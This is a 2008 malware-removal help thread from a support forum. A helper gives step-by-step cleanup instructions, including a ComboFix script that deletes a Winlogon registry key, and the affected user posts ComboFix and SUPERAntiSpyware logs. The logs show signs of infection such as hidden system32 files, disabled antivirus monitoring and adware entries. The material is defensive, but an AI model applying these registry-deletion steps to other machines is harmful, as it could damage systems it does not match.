[-HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\xxyyvSLb]

Save the file to you desktop and name it CFScript.txt

Then drag the CFScript.txt into the ComboFix.exe as shown in the screenshot below.



This will start ComboFix again. It may ask to reboot. Post the contents of Combofix.txt in your next reply.


Use Secunia software inspector & update checker to update your java and any other out of date applications.

Also go to add/remove programs and remove all old versions of Java.



Please update your version of Hijackthis:
Click here to download HJTInstall.exe
  • Save HJTInstall.exe to your desktop.
  • Doubleclick on the HJTInstall.exe icon on your desktop.
  • By default it will install to C:\Program Files\Trend Micro\HijackThis .
  • Click on Install.
  • It will create a HijackThis icon on the desktop.
  • Once installed, it will launch Hijackthis.


Please download ATF Cleaner by Atribune.
This program is for XP and Windows 2000 only
  • Double-click ATF-Cleaner.exe to run the program.
  • Under Select Files to Delete choose: Select All
  • Click the Empty Selected button.

Click Exit on the Main menu to close the program.



Download (save and select your desktop to save it to) SUPERAntiSpyware Free for Home Users
  • Double-click SUPERAntiSpyware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download and unzip them from here.)
  • Under "Configuration and Preferences", click the Preferences button.
  • Click the Scanning Control tab.
  • Under Scanner Options make sure the following are checked (leave all others unchecked):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Close" button to leave the control center screen.
  • Back on the main screen, under "Scan for Harmful Software" click Scan your computer.
  • On the left, make sure you check C:\Fixed Drive and all other fixed drives..
  • On the right, under "Complete Scan", choose Perform Complete Scan.
  • Click "Next" to start the scan. Please be patient while it scans your computer.
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes".
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply with a new hijackthis log.
  • Click Close to exit the program.


Please perform a scan with Kaspersky Webscan Online Virus Scanner
  • Read the Requirements and Privacy statement, then select "Accept".
  • A new window will appear promting you to install an ActiveX component from Kaspersky - "Do you want to install this software?".
  • Click "Yes" or select "Install" to download the ActiveX controls that allows ActiveScan to run.
  • When the download is complete it will say ready, click "Next".
  • Click "Scan Settings" and check the option to use the Extended Database if available otherwise Standard).
  • Click "Scan Options" and select both "Scan Archives" and "Scan Mail Bases".
  • Click "OK".
  • Under "Select a target to scan", click on "My Computer".
  • When the scan is complete choose to save the results as "Save as Text" named kaspersky.txt to your desktop and post them in your next reply.


Kaspersky does not remove anything but will provide a log of anything it finds. On August 8th, 2006 Kaspersky updated the software used for Free Online Virus Scanner. In order to continue using the online scanner you will need to uninstall the old version (if previously used) from your Add/Remove Programs list and then install the latest version. To do this, follow the steps here and reboot afterwards if your system does not reboot automatically or it will show 'Kaspersky Online Scanner license key was not found!
__________________
Microsoft MVP/Windows - Consumer Security
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
07-Apr-2008, 09:26 PM #5
LOGS TOO LONG WILL POST 3 MSGS
~~~~~~~~~~~~~~~~~~~~~~~~

ComboFix 08-04-06.1 - tony 2008-04-07 14:53:05.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.368 [GMT -4:00]
Running from: C:\Documents and Settings\tony\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\tony\Desktop\CFScript.txt
* Created a new restore point
.

((((((((((((((((((((((((( Files Created from 2008-03-07 to 2008-04-07 )))))))))))))))))))))))))))))))
.

2008-04-07 13:15 . 2008-04-07 13:15 54,156 --ah----- C:\WINDOWS\QTFont.qfn
2008-04-07 13:15 . 2008-04-07 13:15 1,409 --a------ C:\WINDOWS\QTFont.for
2008-04-03 18:59 . 2008-04-06 19:10 1,961,974 ---hs---- C:\WINDOWS\system32\qhnhcfho.ini
2008-04-02 18:59 . 2008-04-03 18:58 1,608,371 ---hs---- C:\WINDOWS\system32\qfwvlxew.ini
2008-04-01 19:00 . 2008-04-02 11:33 1,600,123 ---hs---- C:\WINDOWS\system32\yntfdbjo.ini
2008-03-22 13:56 . 2008-03-22 13:56 2,267 --a------ C:\dating.csv
2008-03-10 15:49 . 2008-03-10 15:49 <DIR> d-------- C:\Documents and Settings\tony\Application Data\acccore
2008-03-10 15:46 . 2008-03-10 15:46 <DIR> d-------- C:\Program Files\Common Files\AOL
2008-03-10 15:46 . 2008-03-10 15:48 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\AOL OCP
2008-03-10 15:46 . 2008-03-10 15:46 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\AOL
2008-03-10 15:45 . 2008-03-10 15:47 <DIR> d-------- C:\Program Files\AIM6
2008-03-10 15:45 . 2008-03-10 15:47 445 --ah----- C:\IPH.PH
2008-03-07 16:48 . 2008-03-07 16:48 56,752 --ah----- C:\WINDOWS\system32\mlfcache.dat
2008-03-07 16:43 . 2008-03-29 09:03 <DIR> d-------- C:\Program Files\mIRC
2008-03-07 16:43 . 2008-03-29 13:02 <DIR> d-------- C:\Documents and Settings\tony\Application Data\mIRC
2008-03-07 15:34 . 2008-03-07 15:34 <DIR> d-------- C:\Program Files\LimeWire

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-04-07 18:52 --------- d-----w C:\Program Files\Symantec AntiVirus
2008-04-07 18:37 --------- d-----w C:\Documents and Settings\tony\Application Data\Skype
2008-04-07 15:36 --------- d-----w C:\Program Files\Microsoft AntiSpyware
2008-04-07 15:34 --------- d-----w C:\Program Files\Bifrost
2008-04-07 04:01 --------- d-----w C:\Documents and Settings\tony\Application Data\skypePM
2008-04-06 23:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Google Updater
2008-04-04 15:05 --------- d-----w C:\Documents and Settings\tony\Application Data\Azureus
2008-03-30 12:51 --------- d-----w C:\Program Files\Azureus
2008-03-10 19:46 --------- d-----w C:\Program Files\Viewpoint
2008-03-10 19:46 --------- d-----w C:\Documents and Settings\All Users\Application Data\Viewpoint
2008-03-04 17:39 --------- d-----w C:\Documents and Settings\tony\Application Data\AdobeUM
2008-03-04 17:25 --------- d-----w C:\Program Files\GTrends Made Easy
2008-03-03 19:47 --------- d-----w C:\Documents and Settings\tony\Application Data\Good Keywords v2
2008-03-03 19:43 --------- d-----w C:\Program Files\Softnik Technologies
2008-02-18 17:21 --------- d-----w C:\Program Files\Azoogle
2008-02-10 15:26 --------- d-----w C:\Program Files\FriendBlasterPro
2008-02-09 15:20 20 ---h--w C:\Documents and Settings\All Users\Application Data\PKP_DLec.DAT
2008-02-09 15:20 20 ---h--w C:\Documents and Settings\All Users\Application Data\PKP_DLds.DAT
2008-02-05 15:40 14,163,419 ----a-w C:\klcodec370f.exe
2008-01-29 16:06 32 ----a-w C:\Documents and Settings\All Users\Application Data\ezsid.dat
2008-01-19 02:19 607,744 ----a-w C:\WINDOWS\system32\x264vfw.dll
2007-10-28 01:44 67,984 ----a-w C:\Documents and Settings\tony\Application Data\GDIPFONTCACHEV1.DAT
2007-07-04 13:57 4,096 ----a-w C:\Documents and Settings\tony\log.dat
2005-05-12 03:36 12,288 ----a-w C:\WINDOWS\Fonts\RandFont.dll
2005-03-26 17:43 16,140 ----a-w C:\WINDOWS\Fonts\Fonts\andes.zip
2004-03-11 17:27 40,960 ----a-w C:\Program Files\Uninstall_CDS.exe
2003-11-08 02:54 150 ---ha-w C:\Documents and Settings\tony\hpothb07.dat
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSMSGS"="C:\Program Files\Messenger\MSMSGS.exe" [2004-10-13 12:24 1694208]
"LDM"="C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe" [2003-07-24 21:49 16384]
"Vidalia"="C:\Program Files\Vidalia Bundle\Vidalia\vidalia.exe" [ ]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-09-09 15:15 68856]
"Skype"="C:\Program Files\Skype\Phone\Skype.exe" [2007-12-07 16:08 21686568]
"updateMgr"="C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 17:45 313472]
"Aim6"="C:\Program Files\AIM6\aim6.exe" [2008-01-03 12:15 50528]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE" [2002-07-09 08:50 46592 C:\WINDOWS\SOUNDMAN.EXE]
"EM_EXEC"="C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE" [2001-09-19 09:41 35328]
"Disc Detector"="C:\Program Files\Creative\ShareDLL\CtNotify.exe" [2001-12-25 14:00 191488]
"WINDVDPatch"="CTHELPER.EXE" [2002-07-02 05:56 24576 C:\WINDOWS\system32\CTHELPER.EXE]
"UpdReg"="C:\WINDOWS\UpdReg.EXE" [2000-05-11 01:00 90112]
"Jet Detection"="C:\Program Files\Creative\SBLive\PROGRAM\ADGJDet.exe" [2001-11-29 01:00 28672]
"CTStartup"="C:\Program Files\Creative\Splash Screen\CTEaxSpl.exe" [2001-12-20 01:00 28672]
"gcasServ"="C:\Program Files\Microsoft AntiSpyware\gcasServ.exe" [2005-06-24 15:24 473928]
"RegistryMechanic"="" []
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe" [2006-11-09 16:07 49263]
"Instant Buzz Daemon"="C:\Program Files\Instant Buzz\IBDaemon.exe" [ ]
"ATICCC"="C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" [2006-01-02 17:41 45056]
"NWEReboot"="" []
"NeroFilterCheck"="C:\WINDOWS\system32\NeroCheck.exe" [2001-07-09 11:50 155648]
"HP Software Update"="D:\programs\HP\HP Software Update\HPWuSchd2.exe" [2005-05-11 23:12 49152]
"QuickTime Task"="C:\Program Files\QuickTime\qttask.exe" [2006-09-01 15:57 282624]
"DPAgnt"="C:\Program Files\DigitalPersona\Bin\DPAgnt.exe" [2004-10-13 19:24 913408]
"NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2007-04-19 13:26 7700480]
"nwiz"="nwiz.exe" [2007-04-19 13:26 1626112 C:\WINDOWS\system32\nwiz.exe]
"NvMediaCenter"="C:\WINDOWS\system32\NvMcTray.dll" [2007-04-19 13:26 86016]
"SpySweeperEnterprise"="C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe" [2006-04-19 18:06 1238528]
"ccApp"="c:\Program Files\Common Files\Symantec Shared\ccApp.exe" [2005-08-02 22:00 67184]
"vptray"="c:\PROGRA~1\SYMANT~1\VPTray.exe" [2005-08-18 13:50 120640]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2005-09-23 23:05:26 29696]
Color Calibration.lnk - C:\Program Files\SEC\MagicTune 2.5\GammaTray.exe [2005-02-28 21:35:09 36864]
Event Reminder.lnk - D:\PrintMaster\PrintMaster 16\pmremind.exe [2004-01-20 12:10:38 339968]
Google Updater.lnk - C:\Program Files\Google\Google Updater\GoogleUpdater.exe [2007-09-09 15:15:15 126136]
HP Digital Imaging Monitor.lnk - D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe [2005-05-11 23:23:26 282624]
HP Image Zone Fast Start.lnk - D:\Programs\HP\Digital Imaging\bin\hpqthb08.exe [2005-05-12 00:49:24 73728]
Logitech Desktop Messenger.lnk - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe [2003-07-24 21:49:31 156160]
LUMIX Simple Viewer.lnk - C:\Program Files\Panasonic\LUMIXSimpleViewer\PhLeAutoRun.exe [2005-10-16 19:54:56 61440]
NkbMonitor.exe.lnk - C:\Program Files\Nikon\PictureProject\NkbMonitor.exe [2007-05-20 20:02:44 118784]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\DPWLN ]
C:\WINDOWS\system32\DPWLEvHd.dll 2004-10-13 19:29 102400 C:\WINDOWS\system32\DPWLEvHd.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"msacm.l3acm"= l3codeca.acm
"VIDC.I263"= i263_32.drv
"msacm.ctmp3"= C:\WINDOWS\System32\ctmp3.acm
"vidc.LEAD"= LCODCCMP.DLL
"MSVideo8"= VfWWDM32.dll
"MSACM.MI-SC4"= MI-SC4.acm
"VIDC.wmv3"= wmv9vcm.dll
"msacm.ac3acm"= ac3acm.acm
"vidc.yv12"= yv12vfw.dll
"msacm.l3fhg"= mp3fhg.acm
"VIDC.X264"= x264vfw.dll
"VIDC.HFYU"= huffyuv.dll
"msacm.lameacm"= lameACM.acm
"msacm.divxa32"= divxa32.acm

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"AntiVirusOverride"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\Auth orizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"D:\\Utilities\\Trillian\\trillian.exe"=
"D:\\Utilities\\WS_FTP\\WS_FTP95.exe"=
"C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\backWeb-8876480.exe"=
"C:\\StubInstaller.exe"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"C:\\Program Files\\Real\\RealOne Player\\realplay.exe"=
"C:\\WINDOWS\\system32\\dpvsetup.exe"=
"C:\\WINDOWS\\system32\\rundll32.exe"=
"C:\\WINDOWS\\PCHealth\\HelpCtr\\Binaries\\helpctr.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"D:\\Programs\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"D:\\Programs\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"D:\\babycam\\IPView Pro.exe"=
"C:\\Program Files\\Azureus\\Azureus.exe"=
"C:\\Program Files\\MSN Messenger\\msnmsgr.exe"=
"C:\\Program Files\\MSN Messenger\\livecall.exe"=
"C:\\Program Files\\mIRC\\mirc.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\Glob allyOpenPorts\List]
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"65534:TCP"= 65534:TCP:Limewire

R0 HPT371;HPT371;C:\WINDOWS\system32\DRIVERS\HPT371.sys [2002-08-01 14:01]
R0 hptpro;hptpro;C:\WINDOWS\system32\DRIVERS\hptpro.sys [2002-04-27 14:34]
R1 VIAPFD;VIAPFD;C:\WINDOWS\system32\Drivers\VIAPFD.SYS [2001-12-18 14:45]
R2 ONSIO;ONSIO;C:\WINDOWS\SYSTEM32\DRIVERS\ONSIO.SYS [1998-09-14 08:41]
R2 Viewpoint Manager Service;Viewpoint Manager Service;"C:\Program Files\Viewpoint\Common\ViewpointService.exe" [2007-01-04 17:38]
S0 SMPLSCSI;SMPLSCSI;C:\WINDOWS\system32\drivers\SMPLSCSI.SYS [1998-08-01 12:00]
S1 amdtools;AMD Special Tools Driver;C:\WINDOWS\system32\DRIVERS\amdtools.sys []
S3 dpK0Bx01;Fingerprint Reader Filter Driver;C:\WINDOWS\system32\DRIVERS\dpK0Bx01.sys [2004-08-04 17:58]
S3 dwusbdnt;dwusbdnt;C:\WINDOWS\system32\DRIVERS\dwusbdnt.sys [2002-05-24 11:52]
S3 scsiscan;SCSI Scanner Driver;C:\WINDOWS\system32\DRIVERS\scsiscan.sys [2001-08-17 13:53]
S3 TS Poster;Trackback Poster;"C:\Program Files\Trackback Spider\Poster Service.exe" [2007-05-28 18:01]
S3 UsbdpFP;Fingerprint Reader Class Driver;C:\WINDOWS\system32\DRIVERS\UsbdpFP.sys [2004-08-04 17:59]

.
Contents of the 'Scheduled Tasks' folder
"2008-03-30 00:32:00 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-04-07 16:47:25 C:\WINDOWS\Tasks\Symantec NetDetect.job"
- C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE
.
**************************************************************************

catchme 0.3.1344 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-04-07 14:56:11
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Disc Detector = C:\Program Files\Creative\ShareDLL\CtNotify.exe?X???R???????????????E?@?Disc Detector?A????? ?A?? ????B?e!@???@???@?? C?????E?@?????????@?B???A????? ?A???????B???@?????P?????@?? ????????A~??????????@?q?????????????????B??????????????????????????P??????r ?B
CTStartup = C:\Program Files\Creative\Splash Screen\CTEaxSpl.EXE /run???h??????s?????\?w? ?w???????w???w4???????.??w4???????4???TA?s4???????\'2???A~??A~????????\???\ ???????????U?A~??A~\???\???????(?a??????C@?\???\??????s????\??????s\???@'2? A??s@'2??C@?x???`|?w\?????@

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-04-07 14:57:21
ComboFix-quarantined-files.txt 2008-04-07 18:57:04
ComboFix2.txt 2008-04-07 15:42:28
Pre-Run: 3,903,422,464 bytes free
Post-Run: 3,889,332,224 bytes free
.
2008-03-13 16:02:33 --- E O F ---
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
07-Apr-2008, 09:28 PM #6
SUPERANTISPYWARE LOG
~~~~~~~~~~~~~~~~~

SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 04/07/2008 at 05:27 PM

Application Version : 4.0.1154

Core Rules Database Version : 3432
Trace Rules Database Version: 1424

Scan type : Complete Scan
Total Scan Time : 02:16:22

Memory items scanned : 752
Memory threats detected : 0
Registry items scanned : 7207
Registry threats detected : 22
File items scanned : 164094
File threats detected : 167

Adware.IWantSearchBar
HKLM\Software\Classes\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}\InprocServer32
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}\InprocServer32#ThreadingModel
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}\ProgID
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}\Programmable
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}\TypeLib
HKCR\CLSID\{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}\VersionIndependentProgID
C:\PROGRAM FILES\AZOOGLE\AZOOGLE TOOLBAR\AZOOGLETOOLBAR.DLL
HKU\S-1-5-21-1390067357-764733703-1060284298-1003\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser#{0E1230F8-EA50-42A9-983C-D22ABC2EED3B}
HKCR\ToolBand.ToolBandObj.1
HKCR\ToolBand.ToolBandObj.1\CLSID
HKCR\ToolBand.ToolBandObj
HKCR\ToolBand.ToolBandObj\CLSID
HKCR\ToolBand.ToolBandObj\CurVer
HKCR\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}
HKCR\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}\1.0
HKCR\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}\1.0\0
HKCR\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}\1.0\0\win32
HKCR\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}\1.0\FLAGS
HKCR\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}\1.0\HELPDIR

Adware.Tracking Cookie
C:\Documents and Settings\tony\Cookies\tony@http.edge.vru4[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ad-flow[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.cimedia[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.creditcards[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.link4ads[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.link4ads[3].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.realcities[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.weather[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@adserv.exxxit[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@adserver.infinit[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@adserver[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@advert.hi-media[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@advertising[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@advertising[3].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@advertsoft[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@atdmt[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@banners.inetfast[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@bfast[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@bizrate[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@bluestreak[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@cerambanners[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@click-fr[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@click-safe[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@clickagents[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@consumerreview.dealtime[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@dealtime[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@doubleclick[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@dwclick[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@earth.goclick[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ehg-verticalwebventures.hitbox[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@ehg.hitbox[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[4].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@fastclick[5].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@focusin.ads.targetnet[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@fortunecity[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@goclick[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@hc2.humanclick[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@hg1.hitbox[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@hg1.hitbox[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@hitbox[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@hitbox[3].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@hypercount[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@icover.realmedia[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@macromedia[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@mediaplex[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@mediaplex[3].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@music.windowsmedia.msn[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@overture[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@pathfinder[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@pbid.pro-market[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@pbid.pro-market[3].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@pro-market[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@pro-market[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@questionmarket[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@rd.advertising[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@servedby.advertising[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@servedby.advertising[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@server.iad.liveperson[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@targetnet[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@tpl1.realtracker[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@tribalfusion[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@tripod[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@valueclick[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@valueclick[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@weborama[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@www.cashcount[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@www.clickheretofind[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@www.commission-junction[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@www.findfreesheetmusic[2].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@www.popuptraffic[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@www.qksrv[1].txt
D:\Razor\Documents and Settings\Documents and Settings\LVILANDR\Cookies\lvilandr@www.top-finds[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ad-flow[2].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.cimedia[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.creditcards[1].txt
D:\Razor\Documents and Settings\LVILANDR\Cookies\lvilandr@ads.link4ads[1].txt
